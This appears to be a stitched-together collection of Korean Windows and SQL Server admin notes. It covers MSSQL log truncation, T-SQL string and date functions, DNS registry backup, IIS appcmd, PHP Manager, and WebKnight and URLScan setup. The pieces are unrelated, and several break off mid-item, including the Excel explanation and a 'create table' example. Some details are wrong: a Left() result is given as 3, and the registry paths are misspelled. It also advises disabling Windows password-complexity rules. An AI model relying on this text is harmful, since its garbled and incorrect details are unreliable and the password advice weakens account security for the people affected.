=IF(ISNA(VLOOKUP(D1,Sheet2!D:D,1,FALSE)), "없음", "있음")

이 수식은 Excel의 여러 함수를 조합하여 작성되었으며 각 부분의 기능은 다음과 같습니다:

---------------------------
-- 로그 잘라내기

backup log test with no_log

sp_helpdb test

/*
name ...
----------------...
test ...


name ...
---------------...
test ...
test_log ... -- 축소하고자 하는 로그 파일명
*/


---------------------------
-- 로그 파일 축소
use test
go
dbcc shrinkfile (test_log,0)

/*
DbId FileId CurrentSize MinimumSize UsedPages EstimatedPages
------ ------ ----------- ----------- ----------- --------------
7 2 63 63 56 56

(1개 행 적용됨)

DBCC 실행이 완료되었습니다. DBCC에서 오류 메시지를 출력하면 시스템 관리자에게 문의하십시오.
*/

Windows 2008 Server R2 를 설치한후에 암호를 변경하게 되어 있는데, 복잡한 암호가 아니면 설정이 되지를 않는다.

하지만 너무 복잡한 암호는 또 까먹기도 쉽기에 원하는대로 설정하기를 바라게 된다.

이 부분을 해제하기 위한 방법은

1. 관리도구 -> 로컬 보안정책 -> 계정 정책 -> 암호 정책 를 크릭하면
2. 오른쪽 리스트 중에 암호는 복잡성을 만족해야 함을 사용안함으로 변경한다.

DNS 백업&복구

DNS백업
1. DNS 서비스 중지
2. regedit 실행
3. HKEY_LOCAL_MACHINE\SYSYEM\CirrentcControlSet\Servies\DNS 폴더를 내보내기 선택."DNS1"이라는 파일 이름으로 저장
4. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\DNS Server 폴더를 내보내기 선택. "DNS2"라는 파일이름으로 저장
5. Windows\System32\DNS 디렉터리를 찾아서 확장자가 .dns인 모든파일복사
6. DNS 재시작.

DNS복구
1. 복사한 .dns확장자를 가진 파일을 Windows\System32\DNS에 복사
2. DNS서비스를 중지
3. .reg 확장자를 가진 두개의 파일을 클릭. 그리고 레지스트리에 설치 되었는지 확인.
4. DNS 서비스를 재시작.

MSSQL 함수 사용 및 예문들입니다.

환경은 MS-SQL2005 입니다
※ 문자열 함수 정리

1) Ascii() - 문자열의 제일 왼쪽 문자의 아스키 코드 값을 반환(Integer)
예) SELECT Ascii('abcd')

>> 결과는 a의 아스키 코드값인 97 반환

2) Char() - 정수 아스키 코드를 문자로 반환(Char)
예) SELECT Char(97)

>> 결과는 a 반환

3) Charindex() - 문자열에서 지정한 식의 위치를 반환
예) SELECT Charindex('b','abcde') >> 결과 : 2
SELECT Charindex('b','abcde',2) >> 결과 : 2
SELECT Charindex('b','abcde',3) >> 결과 : 0

-- 인수값이 3개일때 마지막은 abcde 에서의 문자열 검색 시작위치를 말하며
2인경우는 bcde 라는 문자열에 대해서 검색
3인 경우는 cde 라는 문자열에 대해서 검색 하게 된다.

4) Difference() - 두 문자식에 SUONDEX 값 간의 차이를 정수로 반환

예) SELECT Difference('a','b')

5) Left() - 문자열에서 왼쪽에서부터 지정한 수만큼의 문자를 반환

예) SELECT Left('abced',3) 결과 >> 3

6) Len() - 문자열의 길이 반환

예) SELECT Len('abced') 결과>>5

7) Lower() - 대문자를 소문자로 반환

예) SELECT Lower('ABCDE') 결과 >> abcde

8) Ltrim() - 문자열의 왼쪽 공백 제거

예) SELECT Ltrim(' AB CDE') 결과>> AB CDE

9)Nchar() - 지정한 정수 코드의 유니코드 문자 반환

예) SELECT Nchar(20) 결과 >>

10) Replace - 문자열에서 바꾸고 싶은 문자 다른 문자로 변환

예) SELECT Replace('abcde','a','1') 결과>>1bcde

11) Replicate() - 문자식을 지정한 횟수만큼 반복

예) SELECT Replicate('abc',3) 결과>> abcabcabc

12) Reverse() - 문자열을 역순으로 출력

예) SELECT Reverse('abcde') 결과>> edcba

13) Right() - 문자열의 오른쪽에서 부터 지정한 수 만큼 반환(Left() 와 비슷 )

예) SELECT Right('abcde',3) 결과>> cde

14)Rtrim() - 문자열의 오른쪽 공백 제거

예) SELECT Rtrim(' ab cde ') 결과>> ' ab cde' <-- 공백구분을위해 ' 표시

15) Space() - 지정한 수만큼의 공백 문자 반환

예) SELECT Space(10) 결과 >> ' ' -- 그냥 공백이 나옴

확인을 위해서 SELECT 'S'+Space(10)+'E' 결과 >> S E

16) Substring() - 문자,이진,텍스트 또는 이미지 식의 일부를 반환

예) SELECT Substring('abcde',2,3) 결과>> bcd

17)Unicode() - 식에 있는 첫번째 문자의 유니코드 정수 값을 반환

예)SELECT Unicode('abcde') 결과 >> 97

18)Upper() - 소문자를 대문자로 반환

예) SELECT Upper('abcde') 결과>> ABCDE

※ 기타 함수 Tip

19) Isnumeric - 해당 문자열이 숫자형이면 1 아니면 0을 반환

>> 숫자 : 1 , 숫자X :0

예) SELECT Isnumeric('30') 결과 >> 1

SELECT Isnumeric('3z') 결과 >> 0

20) Isdate() - 해당 문자열이 Datetime이면 1 아니면 0
>> 날짜 : 1 , 날짜 X :0
예) SELECT Isdate('20071231') 결과 >> 1

SELECT Isdate(getdate()) 결과 >> 1
SELECT Isdate('2007123') 결과 >> 0

SELECT Isdate('aa') 결과 >> 0

※ 날짜및 시간함수 정리

getdate() >> 오늘 날짜를 반환(datetime)

1> DateAdd() - 지정한 날짜에 일정 간격을 + 새 일정을 반환

예) SELECT Dateadd(s,2000,getdate())

2> Datediff() - 지정한 두 날짜의 간의 겹치는 날짜 및 시간 범위 반환

예)SELECT DateDiff(d,getdate(),(getdate()+31))

3> Datename() -지정한 날짜에 특정 날짜부분을 나타내는 문자열을 반환

예) SELECT Datename(d,getdate())

4> Datepart() -지정한 날짜에 특정 날짜부분을 나타내는 정수를 반환

예) SELECT Datepart(d,getdate())

>> Datename , Datepart 은 결과 값은 같으나 반환 값의 타입이 틀림.

5> Day() -지정한 날짜에 일 부분을 나타내는 정수를 반환

예) SELECT Day(getdate()) -- 일 반환

SELECT Month(getdate()) -- 월 반환

SELECT Year(getdate()) -- 년 반환

6> Getutcdate() -현재 UTC 시간을 나타내는 datetime 값을 반환

예) SELECT Getutcdate()

exec sp_changeobjectowner '소유자.테이블명','변경후소유자'
exec sp_changeobjectowner 'getmeout.mem_staff_rank_temp','dbo'

use testdb

-- DB 정보 보기
exec sp_helpdb testdb

-- LDF 파일 크기 줄이기 -- 트랜잭션 로그파일을 10메가로 생성
backup log testdb with TRUNCATE_ONLY
DBCC SHRINKFILE ([testdb_Log], 10)

-- MDF 파일 크기 줄이기
DBCC SHRINKDATABASE(testdb)

-- MS-SQL의 ldf 파일 용량 줄이기
-- 트랜잭션 로그파일 최소의 단위로 축소
backup log testdb with truncate_only

-- 트랜잭션 로그파일을 삭제
backup log testdb with no_log

-- 트랜잭션 로그파일을 10메가로 생성
dbcc shrinkfile (testdb_log, 10)

DBCC SHRINKFILE (file_name, target_size)
DBCC SHRINKDATABASE (database_name, target_percent)

Ms-Sql의 컬럼을 암호화하기 위한 내장함수가 있다.

-PwdEncrypt : 컬럼의 데이터를 암호화한다. ex. PwdEncrypt('암호화할 데이터')
-PwdCompare : 암호화한 데이터를 비교해서 확인한다. ex. PwdCompare('데이터', 암호화컬럼)

간단 예제

create table TEST (

아티보드로 홈페이지를 제작하면서 SQL 서버에 접속해서 작업을 할 경우가 자주 있는데요

퀴리분석기로 들어가서 모든작업이 가능하긴 하지만 가끔은 EM (엔터프라이즈관리자) 도 사용해야할 경우가 있지요

이때 편리한 프로그램을 소개합니다
Microsoft® SQL Server® 2008 Express with Advanced Services 라는 것으로 인터페이스는 SQL2008 를
닮았으며 SQL 2008 처럼 퀴리분석기과 EM 이 같이 합쳐진듯한 느낌의 인터페이스 입니다

무료로 마이크로소프트에서 배포하는 프로그램입니다

---

Microsoft SQL Server 2008 Express with Tools는 사용이 용이한 SQL Server Express 데이터 플랫폼의 무료 버전입니다. 이 버전에는 웹 또는 로컬 데스크톱용으로 강력한 데이터 기반 응용 프로그램을 더욱 손쉽게 개발할 수 있는 그래픽 관리 도구가 포함되어 있습니다.

개요

Microsoft SQL Server 2008 Express with Tools는 그래픽 관리 도구인 SQL Server Management Studio (SMSS) Express가 포함되어 있는 사용이 용이한 SQL Server Express의 무료 버전입니다. SQL Server 2008 Express는 다양한 기능, 데이터 보호 및 빠른 성능을 제공하며 소규모 서버 응용 프로그램과 로컬 데이터 저장소에 적합합니다.

응용 프로그램의 포함된 일부로 무료 다운로드, 배포 및 재배포가 가능한 SQL Server Express with Tools를 통해 데이터 기반 응용 프로그램을 쉽고 빠르게 개발하고 관리할 수 있습니다.

시스템 요구 사항

---

지원하는 운영 체제:Windows Server 2003 Service Pack 2;Windows Server 2008;Windows Vista;Windows Vista Service Pack 1;Windows XP Service Pack 2;Windows XP Service Pack 3

• 32비트 시스템: Intel 또는 호환 가능한 1GHz 이상의 프로세서가 장착된 컴퓨터(2GHz 이상 권장, 단일 프로세서만 지원됨)
• 64비트 시스템: 1.4 GHz 이상의 프로세서(2GHz 이상 권장, 단일 프로세서만 지원됨)
• 최소 512MB RAM(1GB 이상 권장)
• 1GB의 여유 하드 디스크 공간

참고: 이 릴리스에서는 Windows XP Embedded Edition은 지원하지 않습니다.

참고: SQL Server Express를 설치하려면 컴퓨터에 대한 관리 권한이 있어야 합니다.

SQL Server Express with Tools를 설치하기 전에 릴리스 정보와 추가 정보를 읽는 것이 좋습니다.

1단계: Microsoft .Net Framework 3.5 SP1을 다운로드하고 설치합니다.

2단계: Windows Installer 4.5를 다운로드하고 설치합니다.

3단계: Windows PowerShell 1.0을 다운로드하고 설치합니다.

참고: Windows Powershell 1.0 설치에 대한 자세한 내용은 다음 기술 자료 문서를 참조하십시오.

926139: Windows Server 2003 및 WindowsXP 용 PowerShell 1.0 영어 설치 패키지

926140: Windows Server 2003 및 Windows XP용 PowerShell 1.0 다국어 설치 패키지

926141: Windows Server 2003 및 Windows XP용 PowerShell 1.0 MUI(Multilingual User Interface) 언어 팩

928439: Windows Vista용 Windows PowerShell 1.0 설치 패키지(모든 언어 포함)

4단계: 이 페이지 뒷부분의 적절한 링크를 클릭하여 SQL Server 2008 Express with Advanced Services를 다운로드합니다. 즉시 설치를 시작하려면 실행을 클릭하고, 나중에 SQL Server Express를 설치하려면 저장을 클릭합니다.

서버 : 윈도우 2003
프로그램 : 익스체인지서버

인 경우에 CDO.Message를 이용하고자 할 경우

웹사이트 등록정보에서 응용프로그램 풀을 다음과 같이 변경한다.

DefaultPool => ExchangeApplicantPool


혹시 이렇게 해도 안되면...
c:\windows\system32\cdosys.dll 파일에 웹게스트권한 추가해 준다

이 프로그램은 호스트 관리 프로그램입니다.

[관리 방법]
1. 폴더 관리
폴더는 6개가 관리됩니다.
실행 파일 폴더에 있는 Policies 폴더와
Option.ini 파일에 5개의 폴더를 세팅할 수 있습니다.


2. 호스트 파일 관리
호스트 파일은 host 라는 확장자를 씁니다.
Policies 폴더에 sample.host 파일과 같이 첫번째 줄에는 디폴트 URL을 적고 그 아래 호스트 정책 내용 을 적으면 됩
니다.

-- 호스트 파일 생성/삭제, 호스트 내용 변경은 프로그램상에서도 가능합니다.


3. 프로그램 우측 상단에 "실행/종료시 익스플로어를 모두 종료"를 체크하면 호스트 적용/해제시에 익스플로어가 모
두 종료됩니다.

[사용법]
1. 상단 탭에서 폴더 "클릭"

2. 좌측의 파일 리스트 중에 적용할 파일 "더블 클릭"

3. 좌측 상단에 ▶ 적용 버튼을 누르면 호스트가 적용되고, 해제를 누르면 호스트 적용이 해제 됩니다.

출처 : http://www.saltsoft.com

이번 포스팅에서는 IIS 7 에서 제공되는 새로운 커맨드라인(Command-line) 관리도구 Appcmd.exe 도구를 소개 드립니다. Appcmd.exe 도구를 사용하면 GUI 환경의 인터넷 정보 서비스 관리자를 사용하지 않고 쉽고 빠르게 서버를 제어할 수 있는 기능을 제공합니다. Appcmd.exe 를 통해서 대표적으로 아래 기능들을 수행할 수 있습니다.

* 웹 사이트, 응용 프로그램 풀, 가상 디렉터리의 생성, 삭제, 변경, 설정
* 웹 사이트, 응용 프로그램 풀의 시작, 중지, 재생
* 실행 중인 worker process, 요청에 대한 정보 보기
* IIS, ASP.NET 설정에 대한 가져오기, 내보내기, 변경

Appcmd.exe 도구는 %systemroot%\system32\inetsrv 경로에 있으며 명령을 실행하는 방법은 아래와 같습니다.
사용방법) APPCMD (command) (object-type) <identifier> < /parameter1:value1 ... > 

APPCMD 도구를 사용할 때 지원하는 명령, 개체 유형은 아래와 같습니다.

1. 명령(Command)
add, clear, configure, delete, inspect, install, list, lock, migrate, recycle, reset, restore, search, set, start, stop, uninstall, unlock

2. 개체 유형(object-type)
site, app, vdir, apppool, config, wp, request, module, backup, trace


실제 운영 서버에 사용해 볼만한 몇 가지 명령들을 예제로 정리하였습니다.

1. APPCMD list 명령을 통해 사이트, 응용 프로그램 풀, Worker Processes, 가상 디렉터리 정보 조회
가. Appcmd list site
나. Appcmd list app
다. Appcmd list wp
라. Appcmd list vdir

2. List 명령과 /text:* 파라미터를 추가하여 "xe" 웹 웹사이트에 대한 자세한 정보 얻기
가. Appcmd list app "xe/" /text:*

3. 설치된 모듈 확인
가. Appcmd list module

4. 현재 실행 중인 요청 확인
가. Appcmd list request /site.name:"WEB1"

C:\Windows\System32\inetsrv>APPCMD list request /site.name:"WEB1"
REQUEST "c900000080003a68" (url:POST /MiniPopupMonitor/WebServiceMessenger.asmx,
time:15 msec, client:192.168.0.101, stage:MapRequestHandler, module:ManagedPipelineHandler)

C:\Windows\System32\inetsrv>APPCMD list request /site.name:"WEB1"
REQUEST "b70000008000a3f1" (url:POST /MiniPopupMonitor/WebServiceMessenger.asmx,
time:15 msec, client:192.168.0.102, stage:SendResponse, module:IIS Web Core)

C:\Windows\System32\inetsrv>APPCMD list request /site.name:"WEB1"
REQUEST "ed0000008000d2ee" (url:POST /LoginS.aspx, time:141 msec, client:192.168.0.101,
stage:MapRequestHandler, module:ManagedPipelineHandler)

C:\Windows\System32\inetsrv>APPCMD list request /site.name:"WEB1"
REQUEST "f4000000800083a3" (url:GET /data/images/skin/2 Window_Data Popup/imag
es/dwframe_1.gif, time:16 msec, client:192.168.0.103, stage:SendResponse, module:IIS Web Core)



5. Site 상태 제어
가. Appcmd stop site /site.name:XE
나. Appcmd start site /site.name:XE

6. 글로벌 서버 설정 백업과 복원
가. Appcmd add backup
나. Appcmd restore backup /backup.name:"20101215T224415"

위와 같이 몇 가지 예제를 통해서 appcmd command-line 도구를 활용하는 방법에 대해서 간단히 확인하였습니다. 위 예제에서 다뤄보지 못한 개체 유형(object-type)과 명령(command)이 아직 많이 있으니 도움말을 통해 확인해 보시고 이외에도 유용한 명령이 있으면 추천 부탁 드립니다.

IIS 7 에서 PHP 웹 어플리케이션 사용하신다면 PHP Manager for IIS 모듈을 설치하여 PHP 설치, 설정 관리를 보다 쉽게 하실 수 있습니다. PHP Manager for IIS 모듈에서 제공하는 기능은 아래와 같습니다.

1. 새로운 PHP 버전 설치(등록)
2. PHP 구성에 대한 검증 권장 설정 가이드
3. 다른 여러 버전의 PHP 실행
4. phpinfo() 함수 실행을 통한 설정 점검
5. 다양한 PHP 설정 구성
6. PHP 확장(Extensions) 활성화 또는 비활성화
7. PHP.INI 파일 원격 관리

다소 복잡해 보이고 익숙하지 않은 PHP.INI 설정 파일을 메모장으로 열어 수정한 뒤 검증하는 데까지 발생하는 불편함을 GUI 를 통해 보다 쉽고 간편하게 관리할 수 있는 이점이 있으며 사이트마다 별도의 PHP 버전 적용이 용이한 이점이 있습니다. 그럼, 설치 및 간단히 기능에 대해서 살펴 보도록 하겠습니다.


[설치]
웹 플랫폼 설치 관리자를 사용하시면 쉽게 PHP Manager for IIS를 설치하실 수 있습니다. 설치 방법은 아래와 같습니다.

웹 플랫폼 설치 관리자 - 제품 - PHP Manager for IIS(영어) - 추가 - 설치

또는 아래 링크를 통해 최신버전을 직접 다운로드 받아 설치하실 수 있습니다.

PHP Manager for IIS
http://phpmanager.codeplex.com/releases/view/59970



[기능 살펴보기]
설치가 완료되면 인터넷 정보 서비스 관리자의 기능 보기 메뉴를 통해 새롭게 추가된 "PHP Manager" 모듈을 확인하실 수 있습니다. PHP 5.3.5 버전에 Xpress Engine 이 설치되어 있는 테스트 환경에서 PHP Manager 기능을 실행하여 인터페이스를 살펴보도록 하겠습니다.

PHP Setup, Settings, Extensions 3가지 카테고리로 구분되어 있으며 포스팅 서두에서 언급한 것과 같이 모듈에서 지원하는 기능에 대한 인터페이스를 보실 수 있습니다.

1. View recommendations
PHP Manager 실행 시 가장 먼저 상위에 있는 PHP Setup 항목에 PHP 최적 구성을 권장하기 위한 경고 알림 느낌표가 나타난 것을 확인할 수 있습니다. "View recommendations" 를 클릭하여 어떤 메시지인지 확인해 봅니다.

기본 문서가 Default.htm 으로 설정되어 있으며 index.php 로 변경할 것을 가이드 하고 있습니다. 해당 항목을 체크한 뒤 확인 버튼을 클릭하시면 "기본 문서" 설정의 기본 값을 자동으로 변경해 줍니다. 그 외 권장되는 설정들의 항목이 발견되었다면 아래 제시된 설명을 참조하여 반영 여부를 결정해 주시면 됩니다.

2. Register new PHP version
새로운 버전의 PHP 를 설치하였을 때, php-cgi.exe path 를 설정할 수 있습니다.

3. Change PHP version
여러 버전의 PHP 가 설치되어 있을 때, 해당 웹 사이트의 PHP 버전을 선택하여 적용할 수 있습니다.

4. Check phpinfo()
phpinfo() 함수 실행 결과를 바로 확인할 수 있습니다.

5. Configure error reporting
PHP 오류 리포팅 종류와 로그 파일 경로를 지정할 수 있습니다. 개발 머신으로 선택할 경우 모든 오류, 경고와 알림 메시지를 로그 파일로도 기록할 수 있습니다.

6. Set runtime limits
런타임 제한 설정을 지정할 수 있습니다. Maximum Execution Time 값은 PHP.INI 의 max_execution_time 설정이 됩니다.

7. Manage all settings
복잡한 PHP.INI 메모장으로 편집하던 불편함을 에디팅 도구를 통해 간편하게 설정할 수 있습니다.

8. Enable or disable an extension
Extensions 의 활성/비활성화 또는 추가할 수 있는 인터페이스를 제공합니다.

9. Add an extension
Extensions 을 추가할 수 있는 인터페이스를 제공합니다.

PHP Manager for IIS 1.1 버전에서 제공하는 기능과 인터페이스를 살펴 봤습니다. PHP 를 사용하신다면 유용한 모듈이 되겠습니다.

요청 필터링, URLScan 에 이어 이번에는 IIS 웹 서버에 설치할 수 있는 공개용 방화벽 WebKnight 에 대해서 간략히 정리해 봅니다. 이미 한국정보보호진흥(KISA)원에서 제공하는 "WebKnight를 활용한 IIS 웹서버 보안 강화 가이드" 라는 한글화 된 문서로 잘 정리되어 있으므로 WebKnight 에 대한 전반적인 사항은 아래 링크를 참조해 주시면 좋을 것 같습니다.


WebKnight 자료실
http://toolbox.krcert.or.kr/MMBF/MMBFBBS_S.aspx?MENU_CODE=37&BOARD_ID=8

그래서 이번 포스팅에서는 WebKnight 의 간단한 개요와 실제 IIS 7.5 환경에서 설치하고 기본적으로 제공되는 규칙을 통해 필터링이 동작하는 방법을 간략히 살펴 보도록 하겠습니다.


WebKnight 는 AQTRONIX (http://www.aqtronix.com/?PageID=99) 에서 제공하는 공개용 웹 서버 방화벽입니다. URLScan 툴과 마찬가지로 ISAPI (Internet Server API) 필터에 해당 모듈 DLL 파일을 등록하여 사용하게 됩니다. WebKnight 는 오픈 소스로 제공되며 차단된 기록에 대해서 로깅 정보를 제공해 줍니다. 그리고 Windows Installer 패키지를 사용하여 쉬운 설치가 가능하며 필터링 규칙 및 옵션 변경을 GUI 로 제어할 수는 이점이 있습니다. 또한 설정 변경 후 웹 서비스 재시작이 필요없이 런타임 업데이트가 가능한 특징을 가지고 있습니다.


[WebKnight 설치]
1. WebKnight 2.3 다운로드
http://aqtronix.com/?PageID=99#Download


2. ISAPI 필터 설치
가. URLScan 설치와 마찬가지 WebKnight 를 사용하기 위해서는 설치하기 앞서 ISAPI 필터 모듈이 설치되어 있어야 합니다.
나. 역할 서비스 - 웹 서버 - 응용 프로그램 개발 - ISAPI 필터


3. 다운로드 파일 압축 해제 및 WebKnight.msi 파일 설치
가. MSI 파일로 설치할 경우 자동으로 ISAPI 필터에 WebKnight DLL 이 등록됩니다. (사전에 ISAPI 필터 모듈이 설치되어 있어야 함)


4. 설치 확인
가. 인터넷 정보 서비스 관리자 - ISAPI 필터
나. 이름 : WebKnight, 실행 파일 : C:\Program files\AQTRONIX WebKnight\WebKnight.dll

5. 기본 설정
가. 시작 - 모든 프로그램 - AQTRONIX WebKnight - WebKnight Configuration - WebKnight.xml
1) Mapped Path – Use Allowed Paths - 홈 디렉터리 경로 추가
   

나. WebKnight 폴더 권한 부여 (응용 프로그램 풀 계정)
1) 탐색기를 실행하여 C:\Program files\AQTRONIX WebKnight 폴더에 대해서 속성 - 보안 - 추가
가) IIS 7.0 환경인 경우 : NETWORK SERVICE 계정 추가
나) IIS 7.5 환경인 경우 : IIS_USERS 계정 추가
다. IIS 서비스 재시작



[WebKnight 규칙 적용 테스트]
WebKnight 를 설치하면 기본적으로 Denied Extensions 항목에 아래와 같은 확장자들이 차단되도록 규칙이 생성되어 있습니다. 예로 .inc 파일에 접근했을 때, 어떻게 동작하는 지 살펴 보겠습니다.

inc 확장자를 요청하게 되는 경우 WebKnight 기본 차단 규칙에 포함된 확장자에 해당하므로 WebKnight 에서 제공되는 준비된 경고 페이지를 보여주게 됩니다.

이 때, 어떤 접근에 의해 차단되었는지 확인하기 위해서는 아래 경로에 기록되는 로그 파일을 참조하여 "BLOCKED" 메시지를 확인해 보시면 됩니다. 또는 함께 제공되는 LogAnalysis.exe 툴을 사용하면 GUI 인터페이스로 로그 파일을 쉽게 확인하고 분석하는 데 유용하게 활용할 수 있습니다.


C:\Program Files\AQTRONIX WebKnight\Logfiles 폴더 아래 순차적으로 로그 파일 기록되어 있습니다.


Software: AQTRONIX WebKnight 2.3
#Date: 2010-11-23 16:04:13
#LogTime: GMT (Local-09:00)
#Fields: Date ; Time ; Site Instance ; Event ; Client IP ; Username ; Host header ; Additional info about request (event specific)

…… (중략)

2010-11-23 ; 16:06:02 ; W3SVC1 ; OnPreprocHeaders ; ::1 ; ; localhost ; GET ; /a.inc ; BLOCKED: accessing/running '.inc' file ; HTTP/1.1 ; Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729) ; lang_type=ko; PHPSESSID=7t5nle5ubhdb8c0qspkslh3ts1 ;


WebKnight 가 제공하는 많은 필터링 기능 중 확장자 제한 규칙에 대해서 간단한 테스트를 확인해 보았으며 그 이외에도 아래와 같이 다양한 필터링 기능을 설정할 수 있습니다.

이 자료는 KrCERT-TR-2008-004 "WebKnight를 활용한 IIS 웹서버 보안 강화 가이드"에 포함된 내용을 캡쳐하였습니다. 전반적인 규칙 기능에 대한 설명입니다.

WebKnight 를 설치하게 되면 기본값으로 설정된 차단 정책이 곧바로 동작하게 되므로 로그를 확인하여 정상적인 서비스가 차단되지 않았는지 반드시 확인하셔야 합니다. 보안 장비, 상용 보안 툴을 사용할 수 없는 환경이라면 요청 필터링, URLScan, WebKnight 를 통해서도 충분히 일반적인 공격에 대한 차단 효과를 얻을 수 있습니다. 물론 환경에 맞는 충분한 테스트가 필요하겠습니다.

UrlScan 3.1 은 IIS 웹 서버 운영 환경에서 유해한 특정 HTTP 요청을 차단하는 보안 기능을 제공하는 툴입니다. 웹 서버에 요청되는 패킷을 분석하는 ISAPI 필터에 등록되어 일반적이지 않은 요청 즉, 대표적으로 SQL 인젝션 공격이나 악의적인 공격으로부터 웹 서버를 보호할 수 있는 기능을 지니고 있습니다.

URLScan 을 구성할 경우 아래와 같은 항목들에 대해서 HTTP 요청을 거부할 수 있습니다.
HTTP 요청 메소드/동사(Verb), 요청된 파일 이름 확장자, 의심스런 URL 인코딩, URL 에 non-ASCII 문자열/특정 문자열, 요청에 특정 헤더 항목이 있는 경우 설정에 의한 거부가 가능합니다.


[설치]
URLScan 3.1 버전은 Internet Information Services 5.1(Windows XP), 6.0 or 7.0 에서 사용할 수 있으며 x86, x64 시스템에 해당하는 버전을 다운로드 받아 설치할 수 있습니다. 설치 방법은 아래와 같습니다.

1. 다운로드
Microsoft Urlscan Filter v3.1 (x64)
http://www.microsoft.com/downloads/en/details.aspx?FamilyID=361E5598-C1BD-46B8-B3E7-3980E8BDF0DE


2. URLScan 사용을 위한 역할 서비스 사전 설치
가. 역할 서비스 - 웹 서버 - 응용 프로그램 개발 - ISAPI 필터
나. 역할 서비스 - 웹 서버 - 관리도구 - IIS 6 관리 호환성 - IIS 6 메타베이스 호환성
'IIS 6 메타베이스 호환성' 모듈을 설치하지 않을 경우 설치 시 만약 아래 오류가 발생할 수 있습니다.
IIS Metabase is required to install Microsoft URLScan filter v3.1


3. URLScan 3.1 설치 (x64 기준)
가. %windir%\system32\inetsrv\urlscan 폴더가 생성되고 urlscan.dll, urlscan.ini, log 폴더 생성
나. %windir%\syswow64\inetsrv 폴더가 생성되고 urlscan.dll 파일 생성

4. 설치 확인
가. 인터넷 정보 서비스 관리자 - ISAPI 필터

나. URLscan 3.1 - C:\Windows\system32\inetsrv\urlscan\urlscan.dll 등록 확인
(만약 URLScan 설치 후 ISAPI 필터 기능을 설치하였다면 수동으로 '추가' 할 수 있습니다)

설치 및 ISAPI 필터 추가 방법은 아주 간단합니다. 실제 필터링 규칙을 적용하기 위해서는 URLScan.ini 설정을 통해서 이루어집니다. URLScan.ini 옵션은 아래 microsoft.com 웹 사이트에 상세히 설명되어 있습니다. 중복되는 내용은 포스팅 하지 않으려고 합니다. 옵션에 대한 설명은 아래 링크를 참조해 보시기 바랍니다.


UrlScan 3 Reference
http://learn.iis.net/page.aspx/938/urlscan-3-reference/

How to configure the URLScan Tool
http://support.microsoft.com/kb/326444/en-us


많은 필터링 옵션을 제공하지만 가장 간단히 요청 파일 이름 확장자를 URLScan 을 통해 차단하는 방법을 소개해 드립니다.


[시나리오1]
요청 파일 이름 확장자 .html 을 거부하고 별도 등록되지 않은 다른 모든 파일 확장자는 허용

1. 설정 방법
[DenyExtensions]
.html ; 추가

2. 결과 확인
가. 404.0 - Not Found 오류 발생
나. URLScan Log : GET /index.html Rejected extension+not+allowed file_extension .html

[시나리오2]
요청 파일 이름 확장자 .png 그림 파일을 거부한 경우

1. 설정 방법
[DenyExtensions]
.png ; 추가

2. 결과 확인
가. Iisstart.htm 파일을 정상적으로 액세스 하였지만 해당 파일에 링크된 이미지는 필터링 됨
나. URLScan Log : GET /welcome.png Rejected extension+not+allowed file_extension .png

그 외 SQL 인젝션 차단 등 일반적인 URLScan 사용 시나리오에 대해서 아래 웹 사이트에서 소개하고 있습니다.

Common UrlScan Scenarios
http://learn.iis.net/page.aspx/476/common-urlscan-scenarios/


URLScan 에 의해서 차단된 URLScan 규칙에 의해 차단된 요청은 C:\Windows\system32\inetsrv\urlscan\log 폴더에 기록되며 해당 로그를 LogParser.exe 툴을 통해 분석해 보면 차단된 유형 목록을 쉽게 카운트 해서 볼 수 있습니다.


[참고자료]
Security Guidance for IIS
http://technet.microsoft.com/en-us/library/dd450371(WS.10).aspx

비전문가도 사용하기 쉬운 프로젝트 관리 툴 실제 지식 기반 업무 수행에 초점 … 맞춤형 필드로 편리한 UI 구축

마이크로소프트 프로젝트 2003 버전은 지난 10월 마이크로소프트 오피스 2003과 함께 발표됐다. 주요 오피스 도구들과 데이터 저장간 상호 작용을 개선시키는 데 목적을 두고 있으며 eWEEK 랩 테스트에서는 프로젝트 매니저가 아닌 사람들도 리소스 가상화와 관리를 할 수 있도록 해주는 점이 인상적이었다.

아직 오피스 2000이나 오피스 97에서 새로운 버전으로 업그레이드 하지 않은 사람들이라면 프로젝트 2003의 데이터 통합과 네트워크 리소스 활용에서 새로운 오피스 플랫폼이 제공할 세계를 실감할 수 있을 것이다.

기존의 프로젝트 관리 툴은 선택적으로 반영된 사실에 대한 리포팅이나 긍정적인 측면에 대해 프리젠테이션할 때는 프로젝트 2003보다 훌륭하다고 할 수 있다. 그러나 프로젝트 2003은 실제 데이터의 중복 수집과 데이터 입력 작업을 최소화하고 실제 지식에 기반해 일할 수 있도록 하는 데 초점을 맞추고 있다.

이 제품은 ‘프로젝트 가이드’와의 상호 작용을 통해 문맥 연결에 따른 가이드라인을 계속 제공한다. eWEEK 랩은 프로젝트 가이드가 온라인 도움말보다 훨씬 유용하다고 생각하는데, 온라인 도움말은 화면에 더디게 나타나 작업을 방해할 때가 있기 때문이다. 프로젝트 가이드는 항상 켜져 있으며 툴 속에 통합돼 있다. 추가적인 도움말 자료 역시 제공받을 수 있다.

프로젝트 2003 사용자들은 매일 프로젝트 기대치가 변화하는 환경에서 이 제품이 제공하는 ‘베이스라인스’라는 모니터링 툴을 이용해 어떤 시점에서든 프로젝트 상황의 스냅샷을 생성할 수 있다. 이같이 생성된 스냅샷은 프로젝트의 진행 과정에 대한 기록으로 사용될 수 있으며 이후 프로젝트 분석가들을 위한 참조 포인트가 되기도 한다.

프로젝트 2003 기반의 리포트에서는 많은 상황들이 스프레드시트 분석기로 내보내진다. 또 프로젝트 2003이 형성된 원래 데이터에 의존할 경우 사용자들은 프로젝트 2003 환경 내에서 마법사 기능과 통합된 하이퍼링크를 통해 손쉽게 엑셀 파일로 내보내고 들여올 수 있다.

프로젝트 툴을 다듬어 고유한 요구 사항을 반영시키길 원하는 관리자라면 맞춤형 필드에 대한 규정과 사용 규칙에 대해 정의할 수 있는 많은 옵션을 사용하길 바란다.

또 전형적인 프로젝트 관리 툴의 가득한 바와 선, 다이어그램을 좋아하지 않는 사용자들은 웹 포탈과 같은 외형과 느낌의 프로젝트 2003을 편하게 사용할 수 있을 것이다. 프로젝트 2003은 현재 발생중인 문제, 위험, 새로운 업무나 기타 주의 혹은 대응이 요구되는 아이템들에 대해 재빠른 드릴 다운을 제공한다.

